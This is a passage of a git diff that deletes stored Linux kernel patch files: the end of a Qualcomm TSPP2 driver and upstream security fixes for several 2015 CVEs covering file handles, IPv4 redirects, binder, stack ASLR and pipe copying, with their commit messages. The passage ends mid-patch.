--		src_bitmask |= TSPP2_SRC_EVENT_TSIF_PKT_WRITE_ERROR;
--		tsif_device->stat_pkt_write_err++;
--	}
--
--	if (sts_ctl & TSIF_STS_CTL_PKT_READ_ERR) {
--		src_bitmask |= TSPP2_SRC_EVENT_TSIF_PKT_READ_ERROR;
--		tsif_device->stat_pkt_read_err++;
--	}
--
--	if (sts_ctl & TSIF_STS_CTL_OVERFLOW) {
--		src_bitmask |= TSPP2_SRC_EVENT_TSIF_OVERFLOW;
--		tsif_device->stat_overflow++;
--	}
--
--	if (sts_ctl & TSIF_STS_CTL_LOST_SYNC) {
--		src_bitmask |= TSPP2_SRC_EVENT_TSIF_LOST_SYNC;
--		tsif_device->stat_lost_sync++;
--	}
--
--	if (sts_ctl & TSIF_STS_CTL_TIMEOUT) {
--		src_bitmask |= TSPP2_SRC_EVENT_TSIF_TIMEOUT;
--		tsif_device->stat_timeout++;
--	}
--
--	/* Invoke user TSIF source callbacks if registered for these events */
--	src = &tsif_device->dev->tsif_sources[tsif_device->hw_index];
--
--	spin_lock_irqsave(&src->device->spinlock, flags);
--
--	if (src->event_callback && (src->event_bitmask & src_bitmask))
--		tspp2_event_work_prepare(tsif_device->dev, src->event_callback,
--			src->event_cookie, (src->event_bitmask & src_bitmask));
--
--	spin_unlock_irqrestore(&src->device->spinlock, flags);
--
--	writel_relaxed(sts_ctl, tsif_device->base + TSPP2_TSIF_STS_CTL);
--	/*
--	 * Before returning IRQ_HANDLED to the generic interrupt handling
--	 * framework, we need to make sure all operations, including clearing of
--	 * interrupt status registers in the hardware, are performed.
--	 * Thus a barrier after clearing the interrupt status register
--	 * is required to guarantee that the interrupt status register has
--	 * really been cleared by the time we return from this handler.
--	 */
--	wmb();
--
--	return IRQ_HANDLED;
--}
--
--/**
-- * msm_tspp2_map_irqs() - Get and request IRQs.
-- *
-- * @pdev:	Platform device, containing platform information.
-- * @device:	TSPP2 device.
-- *
-- * Helper function to get IRQ numbers from the platform device and request
-- * the IRQs (i.e., set interrupt handlers) for the TSPP2 and TSIF interrupts.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int msm_tspp2_map_irqs(struct platform_device *pdev,
--				struct tspp2_device *device)
--{
--	int rc;
--	int i;
--
--	/* get IRQ numbers from platform information */
--
--	rc = platform_get_irq_byname(pdev, "TSPP2");
--	if (rc > 0) {
--		device->tspp2_irq = rc;
--	} else {
--		dev_err(&pdev->dev, "%s: Failed to get TSPP2 IRQ", __func__);
--		return -EINVAL;
--	}
--
--	rc = platform_get_irq_byname(pdev, "TSIF0");
--	if (rc > 0) {
--		device->tsif_devices[0].tsif_irq = rc;
--	} else {
--		dev_err(&pdev->dev, "%s: Failed to get TSIF0 IRQ", __func__);
--		return -EINVAL;
--	}
--
--	rc = platform_get_irq_byname(pdev, "TSIF1");
--	if (rc > 0) {
--		device->tsif_devices[1].tsif_irq = rc;
--	} else {
--		dev_err(&pdev->dev, "%s: Failed to get TSIF1 IRQ", __func__);
--		return -EINVAL;
--	}
--
--	rc = platform_get_irq_byname(pdev, "TSPP2_BAM");
--	if (rc > 0) {
--		device->bam_irq = rc;
--	} else {
--		dev_err(&pdev->dev,
--			"%s: Failed to get TSPP2 BAM IRQ", __func__);
--		return -EINVAL;
--	}
--
--	rc = request_irq(device->tspp2_irq, tspp2_isr, IRQF_SHARED,
--			 dev_name(&pdev->dev), device);
--	if (rc) {
--		dev_err(&pdev->dev,
--			"%s: Failed to request TSPP2 IRQ %d : %d",
--			__func__, device->tspp2_irq, rc);
--		goto request_irq_err;
--	}
--
--	for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) {
--		rc = request_irq(device->tsif_devices[i].tsif_irq,
--				tsif_isr, IRQF_SHARED,
--				dev_name(&pdev->dev), &device->tsif_devices[i]);
--		if (rc) {
--			dev_warn(&pdev->dev,
--				"%s: Failed to request TSIF%d IRQ: %d",
--				__func__, i, rc);
--			device->tsif_devices[i].tsif_irq = 0;
--		}
--	}
--
--	return 0;
--
--request_irq_err:
--	device->tspp2_irq = 0;
--	device->tsif_devices[0].tsif_irq = 0;
--	device->tsif_devices[1].tsif_irq = 0;
--	device->bam_irq = 0;
--
--	return -EINVAL;
--}
--
--/* Device driver probe function */
--static int msm_tspp2_probe(struct platform_device *pdev)
--{
--	int rc = 0;
--	struct msm_tspp2_platform_data *data;
--	struct tspp2_device *device;
--	struct msm_bus_scale_pdata *tspp2_bus_pdata = NULL;
--
--	if (pdev->dev.of_node) {
--		/* Get information from device tree */
--		data = msm_tspp2_dt_to_pdata(pdev);
--		/* get device ID */
--		rc = of_property_read_u32(pdev->dev.of_node,
--					"cell-index", &pdev->id);
--		if (rc)
--			pdev->id = -1;
--
--		tspp2_bus_pdata = msm_bus_cl_get_pdata(pdev);
--		pdev->dev.platform_data = data;
--	} else {
--		/* Get information from platform data */
--		data = pdev->dev.platform_data;
--	}
--	if (!data) {
--		pr_err("%s: Platform data not available\n", __func__);
--		return -EINVAL;
--	}
--
--	/* Verify device id is valid */
--	if ((pdev->id < 0) || (pdev->id >= TSPP2_NUM_DEVICES)) {
--		pr_err("%s: Invalid device ID %d\n", __func__, pdev->id);
--		return -EINVAL;
--	}
--
--	device = devm_kzalloc(&pdev->dev,
--				sizeof(struct tspp2_device),
--				GFP_KERNEL);
--	if (!device) {
--		pr_err("%s: Failed to allocate memory for device\n", __func__);
--		return -ENOMEM;
--	}
--	platform_set_drvdata(pdev, device);
--	device->pdev = pdev;
--	device->dev = &pdev->dev;
--	device->dev_id = pdev->id;
--	device->opened = 0;
--
--	/* Register bus client */
--	if (tspp2_bus_pdata) {
--		device->bus_client =
--			msm_bus_scale_register_client(tspp2_bus_pdata);
--		if (!device->bus_client)
--			pr_err("%s: Unable to register bus client\n", __func__);
--	} else {
--		pr_err("%s: Platform bus client data not available. Continue anyway...\n",
--			__func__);
--	}
--
--	rc = msm_tspp2_iommu_info_get(pdev, device);
--	if (rc) {
--		pr_err("%s: Failed to get IOMMU information\n", __func__);
--		goto err_bus_client;
--	}
--
--	rc = msm_tspp2_clocks_setup(pdev, device);
--	if (rc)
--		goto err_clocks_setup;
--
--	rc = msm_tspp2_map_io_memory(pdev, device);
--	if (rc)
--		goto err_map_io_memory;
--
--	rc = msm_tspp2_map_irqs(pdev, device);
--	if (rc)
--		goto err_map_irq;
--
--	mutex_init(&device->mutex);
--
--	tspp2_devices[pdev->id] = device;
--
--	tspp2_debugfs_init(device);
--
--	return rc;
--
--err_map_irq:
--	iounmap(device->base);
--	iounmap(device->tsif_devices[0].base);
--	iounmap(device->tsif_devices[1].base);
--	iounmap(device->bam_props.virt_addr);
--
--err_map_io_memory:
--	tspp2_clocks_put(device);
--
--err_clocks_setup:
--	msm_tspp2_iommu_info_free(device);
--
--err_bus_client:
--	if (device->bus_client)
--		msm_bus_scale_unregister_client(device->bus_client);
--
--	return rc;
--}
--
--/* Device driver remove function */
--static int msm_tspp2_remove(struct platform_device *pdev)
--{
--	int i;
--	int rc = 0;
--	struct tspp2_device *device = platform_get_drvdata(pdev);
--
--	tspp2_debugfs_exit(device);
--
--	if (device->tspp2_irq)
--		free_irq(device->tspp2_irq, device);
--
--	for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++)
--		if (device->tsif_devices[i].tsif_irq)
--			free_irq(device->tsif_devices[i].tsif_irq,
--				&device->tsif_devices[i]);
--
--	/* Unmap memory */
--	iounmap(device->base);
--	iounmap(device->tsif_devices[0].base);
--	iounmap(device->tsif_devices[1].base);
--	iounmap(device->bam_props.virt_addr);
--
--	msm_tspp2_iommu_info_free(device);
--
--	if (device->bus_client)
--		msm_bus_scale_unregister_client(device->bus_client);
--
--	mutex_destroy(&device->mutex);
--
--	tspp2_clocks_put(device);
--
--	return rc;
--}
--
--/* Power Management */
--
--static int tspp2_runtime_suspend(struct device *dev)
--{
--	int ret = 0;
--	struct tspp2_device *device;
--	struct platform_device *pdev;
--
--	/*
--	 * HW manages power collapse automatically.
--	 * Disabling AHB and Core clocsk and "cancelling" bus bandwidth voting.
--	 */
--
--	pdev = container_of(dev, struct platform_device, dev);
--	device = platform_get_drvdata(pdev);
--
--	mutex_lock(&device->mutex);
--
--	if (!device->opened)
--		ret = -EPERM;
--	else
--		ret = tspp2_reg_clock_stop(device);
--
--	mutex_unlock(&device->mutex);
--
--	dev_dbg(dev, "%s\n", __func__);
--
--	return ret;
--}
--
--static int tspp2_runtime_resume(struct device *dev)
--{
--	int ret = 0;
--	struct tspp2_device *device;
--	struct platform_device *pdev;
--
--	/*
--	 * HW manages power collapse automatically.
--	 * Enabling AHB and Core clocks to allow access to unit registers,
--	 * and voting for the required bus bandwidth for register access.
--	 */
--
--	pdev = container_of(dev, struct platform_device, dev);
--	device = platform_get_drvdata(pdev);
--
--	mutex_lock(&device->mutex);
--
--	if (!device->opened)
--		ret = -EPERM;
--	else
--		ret = tspp2_reg_clock_start(device);
--
--	mutex_unlock(&device->mutex);
--
--	dev_dbg(dev, "%s\n", __func__);
--
--	return ret;
--}
--
--static const struct dev_pm_ops tspp2_dev_pm_ops = {
--	.runtime_suspend = tspp2_runtime_suspend,
--	.runtime_resume = tspp2_runtime_resume,
--};
--
--/* Platform driver information */
--
--static struct of_device_id msm_tspp2_match_table[] = {
--	{.compatible = "qcom,msm_tspp2"},
--	{}
--};
--
--static struct platform_driver msm_tspp2_driver = {
--	.probe          = msm_tspp2_probe,
--	.remove         = msm_tspp2_remove,
--	.driver         = {
--		.name   = "msm_tspp2",
--		.pm     = &tspp2_dev_pm_ops,
--		.of_match_table = msm_tspp2_match_table,
--	},
--};
--
--/**
-- * tspp2_module_init() - TSPP2 driver module init function.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int __init tspp2_module_init(void)
--{
--	int rc;
--
--	rc = platform_driver_register(&msm_tspp2_driver);
--	if (rc)
--		pr_err("%s: platform_driver_register failed: %d\n",
--			__func__, rc);
--
--	return rc;
--}
--
--/**
-- * tspp2_module_exit() - TSPP2 driver module exit function.
-- */
--static void __exit tspp2_module_exit(void)
--{
--	platform_driver_unregister(&msm_tspp2_driver);
--}
--
--module_init(tspp2_module_init);
--module_exit(tspp2_module_exit);
--
--MODULE_DESCRIPTION("TSPP2 (Transport Stream Packet Processor v2) platform device driver");
--MODULE_LICENSE("GPL v2");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1420/3.2-^3.19/0001.patch b/Patches/Linux_CVEs/CVE-2015-1420/3.2-^3.19/0001.patch
deleted file mode 100644
index 9d201873..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1420/3.2-^3.19/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8dfc8b9e8432f50606820b40a7d63618d9d61a07 Mon Sep 17 00:00:00 2001
-From: Sasha Levin <sasha.levin@oracle.com>
-Date: Wed, 28 Jan 2015 15:30:43 -0500
-Subject: vfs: read file_handle only once in handle_to_path
-
-commit 161f873b89136eb1e69477c847d5a5033239d9ba upstream.
-
-We used to read file_handle twice.  Once to get the amount of extra
-bytes, and once to fetch the entire structure.
-
-This may be problematic since we do size verifications only after the
-first read, so if the number of extra bytes changes in userspace between
-the first and second calls, we'll have an incoherent view of
-file_handle.
-
-Instead, read the constant size once, and copy that over to the final
-structure without having to re-read it again.
-
-Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
-Cc: Al Viro <viro@zeniv.linux.org.uk>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- fs/fhandle.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/fs/fhandle.c b/fs/fhandle.c
-index 6b08864..c9e18f3 100644
---- a/fs/fhandle.c
-+++ b/fs/fhandle.c
-@@ -196,8 +196,9 @@ static int handle_to_path(int mountdirfd, struct file_handle __user *ufh,
- 		goto out_err;
- 	}
- 	/* copy the full handle */
--	if (copy_from_user(handle, ufh,
--			   sizeof(struct file_handle) +
-+	*handle = f_handle;
-+	if (copy_from_user(&handle->f_handle,
-+			   &ufh->f_handle,
- 			   f_handle.handle_bytes)) {
- 		retval = -EFAULT;
- 		goto out_handle;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1465/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-1465/ANY/0001.patch
deleted file mode 100644
index 30f515a8..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1465/ANY/0001.patch
+++ /dev/null
@@ -1,100 +0,0 @@
-From df4d92549f23e1c037e83323aff58a21b3de7fe0 Mon Sep 17 00:00:00 2001
-From: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Date: Fri, 23 Jan 2015 12:01:26 +0100
-Subject: ipv4: try to cache dst_entries which would cause a redirect
-
-Not caching dst_entries which cause redirects could be exploited by hosts
-on the same subnet, causing a severe DoS attack. This effect aggravated
-since commit f88649721268999 ("ipv4: fix dst race in sk_dst_get()").
-
-Lookups causing redirects will be allocated with DST_NOCACHE set which
-will force dst_release to free them via RCU.  Unfortunately waiting for
-RCU grace period just takes too long, we can end up with >1M dst_entries
-waiting to be released and the system will run OOM. rcuos threads cannot
-catch up under high softirq load.
-
-Attaching the flag to emit a redirect later on to the specific skb allows
-us to cache those dst_entries thus reducing the pressure on allocation
-and deallocation.
-
-This issue was discovered by Marcelo Leitner.
-
-Cc: Julian Anastasov <ja@ssi.bg>
-Signed-off-by: Marcelo Leitner <mleitner@redhat.com>
-Signed-off-by: Florian Westphal <fw@strlen.de>
-Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Signed-off-by: Julian Anastasov <ja@ssi.bg>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- include/net/ip.h      | 11 ++++++-----
- net/ipv4/ip_forward.c |  3 ++-
- net/ipv4/route.c      |  9 +++++----
- 3 files changed, 13 insertions(+), 10 deletions(-)
-
-diff --git a/include/net/ip.h b/include/net/ip.h
-index 0bb6207..f7cbd70 100644
---- a/include/net/ip.h
-+++ b/include/net/ip.h
-@@ -39,11 +39,12 @@ struct inet_skb_parm {
- 	struct ip_options	opt;		/* Compiled IP options		*/
- 	unsigned char		flags;
- 
--#define IPSKB_FORWARDED		1
--#define IPSKB_XFRM_TUNNEL_SIZE	2
--#define IPSKB_XFRM_TRANSFORMED	4
--#define IPSKB_FRAG_COMPLETE	8
--#define IPSKB_REROUTED		16
-+#define IPSKB_FORWARDED		BIT(0)
-+#define IPSKB_XFRM_TUNNEL_SIZE	BIT(1)
-+#define IPSKB_XFRM_TRANSFORMED	BIT(2)
-+#define IPSKB_FRAG_COMPLETE	BIT(3)
-+#define IPSKB_REROUTED		BIT(4)
-+#define IPSKB_DOREDIRECT	BIT(5)
- 
- 	u16			frag_max_size;
- };
-diff --git a/net/ipv4/ip_forward.c b/net/ipv4/ip_forward.c
-index 3a83ce5..787b3c2 100644
---- a/net/ipv4/ip_forward.c
-+++ b/net/ipv4/ip_forward.c
-@@ -129,7 +129,8 @@ int ip_forward(struct sk_buff *skb)
- 	 *	We now generate an ICMP HOST REDIRECT giving the route
- 	 *	we calculated.
- 	 */
--	if (rt->rt_flags&RTCF_DOREDIRECT && !opt->srr && !skb_sec_path(skb))
-+	if (IPCB(skb)->flags & IPSKB_DOREDIRECT && !opt->srr &&
-+	    !skb_sec_path(skb))
- 		ip_rt_send_redirect(skb);
- 
- 	skb->priority = rt_tos2priority(iph->tos);
-diff --git a/net/ipv4/route.c b/net/ipv4/route.c
-index 6a2155b..d58dd0e 100644
---- a/net/ipv4/route.c
-+++ b/net/ipv4/route.c
-@@ -1554,11 +1554,10 @@ static int __mkroute_input(struct sk_buff *skb,
- 
- 	do_cache = res->fi && !itag;
- 	if (out_dev == in_dev && err && IN_DEV_TX_REDIRECTS(out_dev) &&
-+	    skb->protocol == htons(ETH_P_IP) &&
- 	    (IN_DEV_SHARED_MEDIA(out_dev) ||
--	     inet_addr_onlink(out_dev, saddr, FIB_RES_GW(*res)))) {
--		flags |= RTCF_DOREDIRECT;
--		do_cache = false;
--	}
-+	     inet_addr_onlink(out_dev, saddr, FIB_RES_GW(*res))))
-+		IPCB(skb)->flags |= IPSKB_DOREDIRECT;
- 
- 	if (skb->protocol != htons(ETH_P_IP)) {
- 		/* Not IP (i.e. ARP). Do not create route, if it is
-@@ -2303,6 +2302,8 @@ static int rt_fill_info(struct net *net,  __be32 dst, __be32 src,
- 	r->rtm_flags	= (rt->rt_flags & ~0xFFFF) | RTM_F_CLONED;
- 	if (rt->rt_flags & RTCF_NOTIFY)
- 		r->rtm_flags |= RTM_F_NOTIFY;
-+	if (IPCB(skb)->flags & IPSKB_DOREDIRECT)
-+		r->rtm_flags |= RTCF_DOREDIRECT;
- 
- 	if (nla_put_be32(skb, RTA_DST, dst))
- 		goto nla_put_failure;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch
deleted file mode 100644
index 24634bc3..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-diff --git a/drivers/staging/android/binder.c b/drivers/staging/android/binder.c
-index 2e4f44f..0dc39e3 100644
---- a/drivers/staging/android/binder.c
-+++ b/drivers/staging/android/binder.c
-@@ -3579,13 +3579,25 @@
- 
- static int binder_proc_show(struct seq_file *m, void *unused)
- {
-+	struct binder_proc *itr;
- 	struct binder_proc *proc = m->private;
-+	struct hlist_node *pos;
- 	int do_lock = !binder_debug_no_lock;
-+	bool valid_proc = false;
- 
- 	if (do_lock)
- 		mutex_lock(&binder_lock);
--	seq_puts(m, "binder proc state:\n");
--	print_binder_proc(m, proc, 1);
-+
-+	hlist_for_each_entry(itr, pos, &binder_procs, proc_node) {
-+		if (itr == proc) {
-+			valid_proc = true;
-+			break;
-+		}
-+	}
-+	if (valid_proc) {
-+		seq_puts(m, "binder proc state:\n");
-+		print_binder_proc(m, proc, 1);
-+	}
- 	if (do_lock)
- 		mutex_unlock(&binder_lock);
- 	return 0;
diff --git a/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch.base64
deleted file mode 100644
index f27d58b4..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvc3RhZ2luZy9hbmRyb2lkL2JpbmRlci5jIGIvZHJpdmVycy9zdGFnaW5nL2FuZHJvaWQvYmluZGVyLmMKaW5kZXggMmU0ZjQ0Zi4uMGRjMzllMyAxMDA2NDQKLS0tIGEvZHJpdmVycy9zdGFnaW5nL2FuZHJvaWQvYmluZGVyLmMKKysrIGIvZHJpdmVycy9zdGFnaW5nL2FuZHJvaWQvYmluZGVyLmMKQEAgLTM1NzksMTMgKzM1NzksMjUgQEAKIAogc3RhdGljIGludCBiaW5kZXJfcHJvY19zaG93KHN0cnVjdCBzZXFfZmlsZSAqbSwgdm9pZCAqdW51c2VkKQogeworCXN0cnVjdCBiaW5kZXJfcHJvYyAqaXRyOwogCXN0cnVjdCBiaW5kZXJfcHJvYyAqcHJvYyA9IG0tPnByaXZhdGU7CisJc3RydWN0IGhsaXN0X25vZGUgKnBvczsKIAlpbnQgZG9fbG9jayA9ICFiaW5kZXJfZGVidWdfbm9fbG9jazsKKwlib29sIHZhbGlkX3Byb2MgPSBmYWxzZTsKIAogCWlmIChkb19sb2NrKQogCQltdXRleF9sb2NrKCZiaW5kZXJfbG9jayk7Ci0Jc2VxX3B1dHMobSwgImJpbmRlciBwcm9jIHN0YXRlOlxuIik7Ci0JcHJpbnRfYmluZGVyX3Byb2MobSwgcHJvYywgMSk7CisKKwlobGlzdF9mb3JfZWFjaF9lbnRyeShpdHIsIHBvcywgJmJpbmRlcl9wcm9jcywgcHJvY19ub2RlKSB7CisJCWlmIChpdHIgPT0gcHJvYykgeworCQkJdmFsaWRfcHJvYyA9IHRydWU7CisJCQlicmVhazsKKwkJfQorCX0KKwlpZiAodmFsaWRfcHJvYykgeworCQlzZXFfcHV0cyhtLCAiYmluZGVyIHByb2Mgc3RhdGU6XG4iKTsKKwkJcHJpbnRfYmluZGVyX3Byb2MobSwgcHJvYywgMSk7CisJfQogCWlmIChkb19sb2NrKQogCQltdXRleF91bmxvY2soJmJpbmRlcl9sb2NrKTsKIAlyZXR1cm4gMDsK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-1593/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-1593/ANY/0001.patch
deleted file mode 100644
index b0a281f0..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1593/ANY/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-From 4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 Mon Sep 17 00:00:00 2001
-From: Hector Marco-Gisbert <hecmargi@upv.es>
-Date: Sat, 14 Feb 2015 09:33:50 -0800
-Subject: x86, mm/ASLR: Fix stack randomization on 64-bit systems
-
-The issue is that the stack for processes is not properly randomized on
-64 bit architectures due to an integer overflow.
-
-The affected function is randomize_stack_top() in file
-"fs/binfmt_elf.c":
-
-  static unsigned long randomize_stack_top(unsigned long stack_top)
-  {
-           unsigned int random_variable = 0;
-
-           if ((current->flags & PF_RANDOMIZE) &&
-                   !(current->personality & ADDR_NO_RANDOMIZE)) {
-                   random_variable = get_random_int() & STACK_RND_MASK;
-                   random_variable <<= PAGE_SHIFT;
-           }
-           return PAGE_ALIGN(stack_top) + random_variable;
-           return PAGE_ALIGN(stack_top) - random_variable;
-  }
-
-Note that, it declares the "random_variable" variable as "unsigned int".
-Since the result of the shifting operation between STACK_RND_MASK (which
-is 0x3fffff on x86_64, 22 bits) and PAGE_SHIFT (which is 12 on x86_64):
-
-	  random_variable <<= PAGE_SHIFT;
-
-then the two leftmost bits are dropped when storing the result in the
-"random_variable". This variable shall be at least 34 bits long to hold
-the (22+12) result.
-
-These two dropped bits have an impact on the entropy of process stack.
-Concretely, the total stack entropy is reduced by four: from 2^28 to
-2^30 (One fourth of expected entropy).
-
-This patch restores back the entropy by correcting the types involved
-in the operations in the functions randomize_stack_top() and
-stack_maxrandom_size().
-
-The successful fix can be tested with:
-
-  $ for i in `seq 1 10`; do cat /proc/self/maps | grep stack; done
-  7ffeda566000-7ffeda587000 rw-p 00000000 00:00 0                          [stack]
-  7fff5a332000-7fff5a353000 rw-p 00000000 00:00 0                          [stack]
-  7ffcdb7a1000-7ffcdb7c2000 rw-p 00000000 00:00 0                          [stack]
-  7ffd5e2c4000-7ffd5e2e5000 rw-p 00000000 00:00 0                          [stack]
-  ...
-
-Once corrected, the leading bytes should be between 7ffc and 7fff,
-rather than always being 7fff.
-
-Signed-off-by: Hector Marco-Gisbert <hecmargi@upv.es>
-Signed-off-by: Ismael Ripoll <iripoll@upv.es>
-[ Rebased, fixed 80 char bugs, cleaned up commit message, added test example and CVE ]
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Cc: <stable@vger.kernel.org>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Andrew Morton <akpm@linux-foundation.org>
-Cc: Al Viro <viro@zeniv.linux.org.uk>
-Fixes: CVE-2015-1593
-Link: http://lkml.kernel.org/r/20150214173350.GA18393@www.outflux.net
-Signed-off-by: Borislav Petkov <bp@suse.de>
----
- arch/x86/mm/mmap.c | 6 +++---
- fs/binfmt_elf.c    | 5 +++--
- 2 files changed, 6 insertions(+), 5 deletions(-)
-
-diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
-index 919b912..df4552b 100644
---- a/arch/x86/mm/mmap.c
-+++ b/arch/x86/mm/mmap.c
-@@ -35,12 +35,12 @@ struct va_alignment __read_mostly va_align = {
- 	.flags = -1,
- };
- 
--static unsigned int stack_maxrandom_size(void)
-+static unsigned long stack_maxrandom_size(void)
- {
--	unsigned int max = 0;
-+	unsigned long max = 0;
- 	if ((current->flags & PF_RANDOMIZE) &&
- 		!(current->personality & ADDR_NO_RANDOMIZE)) {
--		max = ((-1U) & STACK_RND_MASK) << PAGE_SHIFT;
-+		max = ((-1UL) & STACK_RND_MASK) << PAGE_SHIFT;
- 	}
- 
- 	return max;
-diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c
-index 02b1691..995986b 100644
---- a/fs/binfmt_elf.c
-+++ b/fs/binfmt_elf.c
-@@ -645,11 +645,12 @@ out:
- 
- static unsigned long randomize_stack_top(unsigned long stack_top)
- {
--	unsigned int random_variable = 0;
-+	unsigned long random_variable = 0;
- 
- 	if ((current->flags & PF_RANDOMIZE) &&
- 		!(current->personality & ADDR_NO_RANDOMIZE)) {
--		random_variable = get_random_int() & STACK_RND_MASK;
-+		random_variable = (unsigned long) get_random_int();
-+		random_variable &= STACK_RND_MASK;
- 		random_variable <<= PAGE_SHIFT;
- 	}
- #ifdef CONFIG_STACK_GROWSUP
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch
deleted file mode 100644
index 4df035f9..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch
+++ /dev/null
@@ -1,152 +0,0 @@
-diff --git a/fs/pipe.c b/fs/pipe.c
-index d2c45e1..d866c6f 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -117,25 +117,27 @@
- }
- 
- static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
--			int atomic)
-+pipe_iov_copy_from_user(void *addr, int *offset, struct iovec *iov,
-+			size_t *remaining, int atomic)
- {
- 	unsigned long copy;
- 
--	while (len > 0) {
-+	while (*remaining > 0) {
- 		while (!iov->iov_len)
- 			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
-+		copy = min_t(unsigned long, *remaining, iov->iov_len);
- 
- 		if (atomic) {
--			if (__copy_from_user_inatomic(to, iov->iov_base, copy))
-+			if (__copy_from_user_inatomic(addr + *offset,
-+						      iov->iov_base, copy))
- 				return -EFAULT;
- 		} else {
--			if (copy_from_user(to, iov->iov_base, copy))
-+			if (copy_from_user(addr + *offset,
-+					   iov->iov_base, copy))
- 				return -EFAULT;
- 		}
--		to += copy;
--		len -= copy;
-+		*offset += copy;
-+		*remaining -= copy;
- 		iov->iov_base += copy;
- 		iov->iov_len -= copy;
- 	}
-@@ -143,25 +145,27 @@
- }
- 
- static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
--		      int atomic)
-+pipe_iov_copy_to_user(struct iovec *iov, void *addr, int *offset,
-+		      size_t *remaining, int atomic)
- {
- 	unsigned long copy;
- 
--	while (len > 0) {
-+	while (*remaining > 0) {
- 		while (!iov->iov_len)
- 			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
-+		copy = min_t(unsigned long, *remaining, iov->iov_len);
- 
- 		if (atomic) {
--			if (__copy_to_user_inatomic(iov->iov_base, from, copy))
-+			if (__copy_to_user_inatomic(iov->iov_base,
-+						    addr + *offset, copy))
- 				return -EFAULT;
- 		} else {
--			if (copy_to_user(iov->iov_base, from, copy))
-+			if (copy_to_user(iov->iov_base,
-+					 addr + *offset, copy))
- 				return -EFAULT;
- 		}
--		from += copy;
--		len -= copy;
-+		*offset += copy;
-+		*remaining -= copy;
- 		iov->iov_base += copy;
- 		iov->iov_len -= copy;
- 	}
-@@ -395,7 +399,7 @@
- 			struct pipe_buffer *buf = pipe->bufs + curbuf;
- 			const struct pipe_buf_operations *ops = buf->ops;
- 			void *addr;
--			size_t chars = buf->len;
-+			size_t chars = buf->len, remaining;
- 			int error, atomic;
- 
- 			if (chars > total_len)
-@@ -409,9 +413,11 @@
- 			}
- 
- 			atomic = !iov_fault_in_pages_write(iov, chars);
-+			remaining = chars;
- redo:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
-+			error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+						      &remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			if (unlikely(error)) {
- 				/*
-@@ -426,7 +432,6 @@
- 				break;
- 			}
- 			ret += chars;
--			buf->offset += chars;
- 			buf->len -= chars;
- 
- 			/* Was it a packet buffer? Clean up and exit */
-@@ -531,6 +536,7 @@
- 		if (ops->can_merge && offset + chars <= PAGE_SIZE) {
- 			int error, atomic = 1;
- 			void *addr;
-+			size_t remaining = chars;
- 
- 			error = ops->confirm(pipe, buf);
- 			if (error)
-@@ -539,8 +545,8 @@
- 			iov_fault_in_pages_read(iov, chars);
- redo1:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_from_user(offset + addr, iov,
--							chars, atomic);
-+			error = pipe_iov_copy_from_user(addr, &offset, iov,
-+							&remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			ret = error;
- 			do_wakeup = 1;
-@@ -575,6 +581,8 @@
- 			struct page *page = pipe->tmp_page;
- 			char *src;
- 			int error, atomic = 1;
-+			int offset = 0;
-+			size_t remaining;
- 
- 			if (!page) {
- 				page = alloc_page(GFP_HIGHUSER);
-@@ -595,14 +603,15 @@
- 				chars = total_len;
- 
- 			iov_fault_in_pages_read(iov, chars);
-+			remaining = chars;
- redo2:
- 			if (atomic)
- 				src = kmap_atomic(page);
- 			else
- 				src = kmap(page);
- 
--			error = pipe_iov_copy_from_user(src, iov, chars,
--							atomic);
-+			error = pipe_iov_copy_from_user(src, &offset, iov,
-+							&remaining, atomic);
- 			if (atomic)
